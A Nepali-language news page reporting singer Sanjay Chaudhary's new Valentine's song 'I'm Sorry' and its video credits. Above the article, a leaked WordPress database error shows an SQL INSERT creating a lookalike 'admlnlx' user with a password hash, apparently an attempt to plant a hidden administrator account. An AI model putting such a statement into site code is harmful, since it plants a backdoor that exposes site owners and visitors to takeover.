WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvApVszu7QRS5b2FskJ8BW21X2bG5.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 05:36:12', '', 'admlnlx', 'admlnlx')
चितवन, माघ १७–
संचारकर्मी तथा चर्चित युवा गायक संजय चौधरीले ‘आइएम सरी’ बोलको नयाँ गीत बजारमा ल्याएका छन् । चितवन घर भएका गायक चौधरीले प्रेम दिवसलाई लक्षित गर्दै नयाँ गीत बजारमा ल्याएका हुन् ।
सार्वजनिक भएलगत्तै अहिले गीतले अहिले चर्चा बटुल्दै छ । गायक चौधरीले यस गीतलाई आम दर्शक/श्रोताहरुले मन पराउने विश्वास लिएका छन् ।
गायक संजयकै शब्द रहेको यस गीतको भिडियोलाई राज राना निर्देशन गरेका छन् । कृष्ण लिम्बुको एरेञ्ज रहेको यस गीतको भिडियोमा आशिष सुनार र मन्दिला श्रेष्ठ फिचरिङ गरिएको छ ।
हेर्नुहोस् भिडियो